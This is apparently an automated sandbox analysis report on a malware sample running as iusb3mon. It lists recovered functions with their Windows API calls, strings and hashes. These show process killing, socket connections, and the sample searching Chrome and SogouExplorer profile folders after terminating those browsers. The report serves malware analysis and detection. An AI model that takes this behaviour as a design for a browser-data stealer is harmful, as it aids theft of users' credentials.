Opcode Fuzzy Hash: cf11046d1766ffb804204346d3b2791c4161f8e42f1127115c1193ba3703ee97
Instruction Fuzzy Hash: 8D3128729182567FFBB03F75AC88B3FB79DFA491547090938F696C3280E661CC4487A1

Function 06CF3441 Relevance: 12.1, APIs: 8, Instructions: 94processCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 06CF3446
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 06CF345C
Process32First.KERNEL32(00000000,?), ref: 06CF3475
Process32Next.KERNEL32(00000000,00000128), ref: 06CF3497
Process32Next.KERNEL32(00000000,00000128), ref: 06CF34EF
OpenProcess.KERNEL32(00000001,00000000,?,?,00000000,00000128,00000000,?,00000002,00000000), ref: 06CF34FF
TerminateProcess.KERNEL32(00000000,00000000), ref: 06CF3509
CloseHandle.KERNEL32(00000000), ref: 06CF3510

Part of subcall function 06D084B1: InterlockedDecrement.KERNEL32(-000000F4), ref: 06D084C5

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Process32$NextProcess$CloseCreateDecrementFirstH_prologHandleInterlockedOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 87439402-0
Opcode ID: 34654362012dbc494080be3edb7795bac8b75a6e3540544e83d23e79269a2050
Instruction ID: a32f2eb749e5ae997205cd663a65869342f0a08d8921bfbc2da31f85c4af16a5
Opcode Fuzzy Hash: 34654362012dbc494080be3edb7795bac8b75a6e3540544e83d23e79269a2050
Instruction Fuzzy Hash: 7C318071901159FEEFD5EBB0CC90AFE7B79EF54350F100069EA25A21C0DB348B45DAA0

Function 06D0B68A Relevance: 12.1, APIs: 8, Instructions: 65memorystringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32(?), ref: 06D0B6AA
lstrcmpA.KERNEL32(?,?), ref: 06D0B6B6
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 06D0B6C8
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 06D0B6EB
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 06D0B6F3
GlobalLock.KERNEL32(00000000), ref: 06D0B700
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 06D0B70D
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 06D0B72B

Part of subcall function 06D0B94C: GlobalFlags.KERNEL32(?), ref: 06D0B956
Part of subcall function 06D0B94C: GlobalUnlock.KERNEL32(?), ref: 06D0B96D
Part of subcall function 06D0B94C: GlobalFree.KERNEL32(?), ref: 06D0B978

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: 7b6941c73ce14317d89954e1de09a323a48d6ef92226159935031b6e950225cf
Instruction ID: 56c0177d48255c7b22033933afa1892db0f6d7b978798381debac8bd8b4cc7d2
Opcode Fuzzy Hash: 7b6941c73ce14317d89954e1de09a323a48d6ef92226159935031b6e950225cf
Instruction Fuzzy Hash: 8F119E71900204BAFBA1ABB5CC49FBF7ABEEF89A00F50081AF618C2151D6329900D730

Function 06D01FA5 Relevance: 10.7, APIs: 7, Instructions: 186processsynchronizationCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(06CFE9E9,06CFE9E9,00000000,00000000,00000001,000000FF,06D0E590,00000000,?,?,00000000,00000000,06D1EE8C), ref: 06D0210C
GetLastError.KERNEL32 ref: 06D02114
WaitForSingleObject.KERNEL32(?,000000FF), ref: 06D02151
GetExitCodeProcess.KERNEL32(?,?), ref: 06D0215E
CloseHandle.KERNEL32(?), ref: 06D02167
CloseHandle.KERNEL32(?), ref: 06D02174
CloseHandle.KERNEL32(06CFEA45), ref: 06D02184

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CloseHandle$Process$CodeCreateErrorExitLastObjectSingleWait
String ID:
API String ID: 966596688-0
Opcode ID: b90e6dc7f8b10b861f16e56bd94b5c22e72f0a0422bfdd52d088171b8bf0e57f
Instruction ID: 42d3ca61ed805b420407815552c02e7870ff4657553fd41458bb6c36ee24f586
Opcode Fuzzy Hash: b90e6dc7f8b10b861f16e56bd94b5c22e72f0a0422bfdd52d088171b8bf0e57f
Instruction Fuzzy Hash: 9C613571C042099FEBA18FA8CC48BEDBBB5FF05310F108159E5619B2D0C7729605CBA1

Function 00C01B50 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 162COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00C01BD3
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00C01C1F
__Getctype.LIBCPMT ref: 00C01C38
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00C01C54
std::_Lockit::~_Lockit.LIBCPMT ref: 00C01CE9

Strings

bad locale name, xrefs: 00C01D07

Memory Dump Source

Source File: 00000021.00000002.4641361080.0000000000C01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000021.00000002.4641280448.0000000000C00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4641470551.0000000000C1E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4642950817.0000000000C2C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643038752.0000000000C2E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643154728.0000000000C59000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643234558.0000000000C5A000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000C74000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CA0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CC3000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CE4000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D06000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D10000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D12000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D14000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D2C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D30000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D3C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D60000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D65000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D6D000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4646248262.0000000000FF8000.00000020.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_c00000_iusb3mon.jbxd

Similarity

API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 1840309910-1405518554
Opcode ID: 8d5db0cdeec2bf76c3a8df7b9cc9d071e332c0eed5ff8075142afcd3b2a2fe01
Instruction ID: e1f1593ab5bd261b5f55ddf674d070c3ba59d4bfbeb83c2db493a2aa50d83aea
Opcode Fuzzy Hash: 8d5db0cdeec2bf76c3a8df7b9cc9d071e332c0eed5ff8075142afcd3b2a2fe01
Instruction Fuzzy Hash: DD5150B1D003489BEF10DFA8D94579EFBB8AF14714F184129EC15AB281E775EA08DB92

Function 06CF41BC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 98filestringCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,00000000,?,?), ref: 06CF420B
WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?), ref: 06CF422E
CloseHandle.KERNEL32(00000000,?,?), ref: 06CF4240
wsprintfA.USER32 ref: 06CF4271
lstrcpyA.KERNEL32(?,?,?,?), ref: 06CF428A

Part of subcall function 06CF3FC8: wsprintfA.USER32 ref: 06CF40AA

Strings

%s %s, xrefs: 06CF426B

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Filewsprintf$CloseCreateHandleWritelstrcpy
String ID: %s %s
API String ID: 3555437440-2939940506
Opcode ID: f4fce223ad87e92a4519083c63e85f8320956ad4f0440b2d49cea2cb0223efd3
Instruction ID: d1959b65daacdb1dc6690a607be6d34fd28febc794af5232a194c9e986784ee8
Opcode Fuzzy Hash: f4fce223ad87e92a4519083c63e85f8320956ad4f0440b2d49cea2cb0223efd3
Instruction Fuzzy Hash: 64319A72910119BEEBE4DBB4DC8DFDB77BC9B04314F0045A6F709E2181E6319A848BA0

Function 06CF1434 Relevance: 10.6, APIs: 7, Instructions: 87networkCOMMON

Download Yara Rule

APIs

Part of subcall function 06CF180D: setsockopt.WS2_32(?,0000FFFF,00000080,06CF546D,00000004), ref: 06CF1832
Part of subcall function 06CF180D: CancelIo.KERNEL32(?), ref: 06CF183B
Part of subcall function 06CF180D: InterlockedExchange.KERNEL32(?,00000000), ref: 06CF1847
Part of subcall function 06CF180D: closesocket.WS2_32(?), ref: 06CF1850
Part of subcall function 06CF180D: SetEvent.KERNEL32(?), ref: 06CF1859

ResetEvent.KERNEL32(?,00000000,00000000,00006365), ref: 06CF1451
socket.WS2_32(00000002,00000001,00000006), ref: 06CF1460
gethostbyname.WS2_32(?), ref: 06CF1471
htons.WS2_32(?), ref: 06CF1486
connect.WS2_32(?,00000002,00000010), ref: 06CF14A3
setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 06CF14C8
WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 06CF14F9

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Eventsetsockopt$CancelExchangeInterlockedIoctlResetclosesocketconnectgethostbynamehtonssocket
String ID:
API String ID: 4281462294-0
Opcode ID: 7576b87e4bf851b2337476f42c947e6e8f5aab6ed1a340a7eb8081dd75ac9058
Instruction ID: 3aa261a052a41980188a8d2e1d364ee0e99e7b13236d0aba0781b21307985d92
Opcode Fuzzy Hash: 7576b87e4bf851b2337476f42c947e6e8f5aab6ed1a340a7eb8081dd75ac9058
Instruction Fuzzy Hash: AD31B171900219FFE7609FA4CC84EAEBBBDFF08318F104529F752A6690D7B199489B60

Function 06CF4D89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 79fileCOMMON

Download Yara Rule

APIs

SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001C,00000000), ref: 06CF4DBD
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 06CF4E10
GetFileSize.KERNEL32(00000000,00000000), ref: 06CF4E21
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 06CF4E3C

Part of subcall function 06CF4D3F: LocalAlloc.KERNEL32(00000040,?), ref: 06CF4D52
Part of subcall function 06CF4D3F: LocalFree.KERNEL32(00000000,00000000,?), ref: 06CF4D7A

CloseHandle.KERNEL32(?), ref: 06CF4E59

Strings

.dat, xrefs: 06CF4DEB

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFolderFreeHandlePathReadSizeSpecial
String ID: .dat
API String ID: 3272996501-100240174
Opcode ID: c7506da65490359cdf8172a0173a368e86ef0dbb09ea2f0b177f8a35e29eb316
Instruction ID: 3bbe1f1d0d834c89174743b891887258a204cee2b1d0d902ad8bae8a68677c8c
Opcode Fuzzy Hash: c7506da65490359cdf8172a0173a368e86ef0dbb09ea2f0b177f8a35e29eb316
Instruction Fuzzy Hash: 0D21AA71D0021CBBEBA5ABB4DC85FDF777DEB48350F0009A5F315E2240D6B09A449A64

Function 06CF43C6 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 77stringprocessCOMMON

Download Yara Rule

APIs

Part of subcall function 06CF91B3: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00006365), ref: 06CF9216
Part of subcall function 06CF91B3: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 06CF922E
Part of subcall function 06CF91B3: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 06CF923E
Part of subcall function 06CF91B3: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 06CF924E
Part of subcall function 06CF91B3: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 06CF925B
Part of subcall function 06CF91B3: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 06CF9268
Part of subcall function 06CF91B3: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00006365), ref: 06CF93F3

lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 06CF4421
lstrcpyA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 06CF4446
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 06CF448C

Strings

D, xrefs: 06CF4459
WinSta0\Default, xrefs: 06CF4462
Applications\iexplore.exe\shell\open\command, xrefs: 06CF4404

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$CreateFreeLoadProcesslstrcpylstrlen
String ID: Applications\iexplore.exe\shell\open\command$D$WinSta0\Default
API String ID: 326945973-490771695
Opcode ID: bd74374ecf60c48cc00cb0004601d88648f55927741984bc448da926e67165fd
Instruction ID: ddf55b0a626bea6221c1f1b31f61685d10c9505de81344adcca700f021124117
Opcode Fuzzy Hash: bd74374ecf60c48cc00cb0004601d88648f55927741984bc448da926e67165fd
Instruction Fuzzy Hash: 3F116F72901128BADBA09BE1DC48BDB7BBCAF40751F008415AB09F6251DA749685CAA0

Function 00C11001 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00C023D4,?,22D6AB0D,?,00C1110E,000000FF,00C1D604,00C023D4,00000000), ref: 00C110C2

Strings

api-ms-, xrefs: 00C11058
ext-ms-, xrefs: 00C1106C

Memory Dump Source

Source File: 00000021.00000002.4641361080.0000000000C01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00C00000, based on PE: true

Associated: 00000021.00000002.4641280448.0000000000C00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4641470551.0000000000C1E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4642950817.0000000000C2C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643038752.0000000000C2E000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643154728.0000000000C59000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643234558.0000000000C5A000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000C74000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CA0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CC3000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000CE4000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D06000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D0E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D10000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D12000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D14000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D2C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D30000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D3C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D60000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D65000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4643316484.0000000000D6D000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000021.00000002.4646248262.0000000000FF8000.00000020.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_c00000_iusb3mon.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 79e68041c1b15d22bb0b9db69893042d63046a4f836ec619e46808234a6d6425
Instruction ID: 03725f02012379ddbf62c7f7299b09d75ef3b6777a90563425eba95127fef57f
Opcode Fuzzy Hash: 79e68041c1b15d22bb0b9db69893042d63046a4f836ec619e46808234a6d6425
Instruction Fuzzy Hash: 09210871E01250ABC7319B219C40BDE3768EB5B360F290215EE15A72C1DA74EEC1E6D0

Function 06D03F94 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 61stringCOMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 06D03FD2
GetSystemMetrics.USER32(00000000), ref: 06D03FEA
GetSystemMetrics.USER32(00000001), ref: 06D03FF1
lstrcpyA.KERNEL32(?,DISPLAY), ref: 06D04015

Strings

DISPLAY, xrefs: 06D0400F
B, xrefs: 06D03FB3

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: System$Metrics$InfoParameterslstrcpy
String ID: B$DISPLAY
API String ID: 1409579217-3316187204
Opcode ID: 2db5dd573d568c2e34f10acbc4946568f549c0c95199792a778a969f0f2ae9bb
Instruction ID: d4b2780c92e11bb4e2c2f0db0574cf726224de9b300be0ea3a4541d4da859fd3
Opcode Fuzzy Hash: 2db5dd573d568c2e34f10acbc4946568f549c0c95199792a778a969f0f2ae9bb
Instruction Fuzzy Hash: 02110271A04221EFEB519F65CC84F9BBFE8EF19751B004012EE05AF186D3B1D540CBA0

Function 06CF4796 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 57sleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 06CF479B

Part of subcall function 06CF3441: __EH_prolog.LIBCMT ref: 06CF3446
Part of subcall function 06CF3441: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 06CF345C
Part of subcall function 06CF3441: Process32First.KERNEL32(00000000,?), ref: 06CF3475

SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 06CF47C9

Part of subcall function 06D087FB: lstrlenA.KERNEL32(?), ref: 06D0883F

Part of subcall function 06D08633: __EH_prolog.LIBCMT ref: 06D08638

Part of subcall function 06D085BF: __EH_prolog.LIBCMT ref: 06D085C4

Part of subcall function 06D084B1: InterlockedDecrement.KERNEL32(-000000F4), ref: 06D084C5

Sleep.KERNEL32(000003E8,?,00000000,\AppData\Local\Google\Chrome\User Data\Default,?,C:\Users\,?), ref: 06CF4825

Part of subcall function 06CF2E2C: __EH_prolog.LIBCMT ref: 06CF2E31
Part of subcall function 06CF2E2C: FindFirstFileA.KERNEL32(?,?), ref: 06CF2EBF
Part of subcall function 06CF2E2C: FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 06CF2F7F

Strings

C:\Users\, xrefs: 06CF47F6
chrome.exe, xrefs: 06CF47AC
\AppData\Local\Google\Chrome\User Data\Default, xrefs: 06CF4801

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: H_prolog$FileFindFirst$CreateDecrementFolderInterlockedNextPathProcess32SleepSnapshotSpecialToolhelp32lstrlen
String ID: C:\Users\$\AppData\Local\Google\Chrome\User Data\Default$chrome.exe
API String ID: 12226711-2559963756
Opcode ID: 9d0ca0a287c5743ba35ead1b8b4e55c04d0d13d20c72250a3d889709c9912022
Instruction ID: 0fa51cde13acf687e24bfbbf1d1174109dbc7635e9b4e962831f8a8b57dbc6e1
Opcode Fuzzy Hash: 9d0ca0a287c5743ba35ead1b8b4e55c04d0d13d20c72250a3d889709c9912022
Instruction Fuzzy Hash: 46116671D50219BAEF95E7E0DD45FEEB7B8EF18700F104155A221B62C0DB745B089A61

Function 06CF4AE3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 57sleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 06CF4AE8

Part of subcall function 06CF3441: __EH_prolog.LIBCMT ref: 06CF3446
Part of subcall function 06CF3441: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 06CF345C
Part of subcall function 06CF3441: Process32First.KERNEL32(00000000,?), ref: 06CF3475

SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000), ref: 06CF4B16

Part of subcall function 06D087FB: lstrlenA.KERNEL32(?), ref: 06D0883F

Part of subcall function 06D08633: __EH_prolog.LIBCMT ref: 06D08638

Part of subcall function 06D085BF: __EH_prolog.LIBCMT ref: 06D085C4

Part of subcall function 06D084B1: InterlockedDecrement.KERNEL32(-000000F4), ref: 06D084C5

Sleep.KERNEL32(000003E8,?,00000000,\AppData\Roaming\SogouExplorer,?,C:\Users\,?), ref: 06CF4B72

Part of subcall function 06CF2E2C: __EH_prolog.LIBCMT ref: 06CF2E31
Part of subcall function 06CF2E2C: FindFirstFileA.KERNEL32(?,?), ref: 06CF2EBF
Part of subcall function 06CF2E2C: FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 06CF2F7F

Strings

C:\Users\, xrefs: 06CF4B43
SogouExplorer.exe, xrefs: 06CF4AF9
\AppData\Roaming\SogouExplorer, xrefs: 06CF4B4E

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
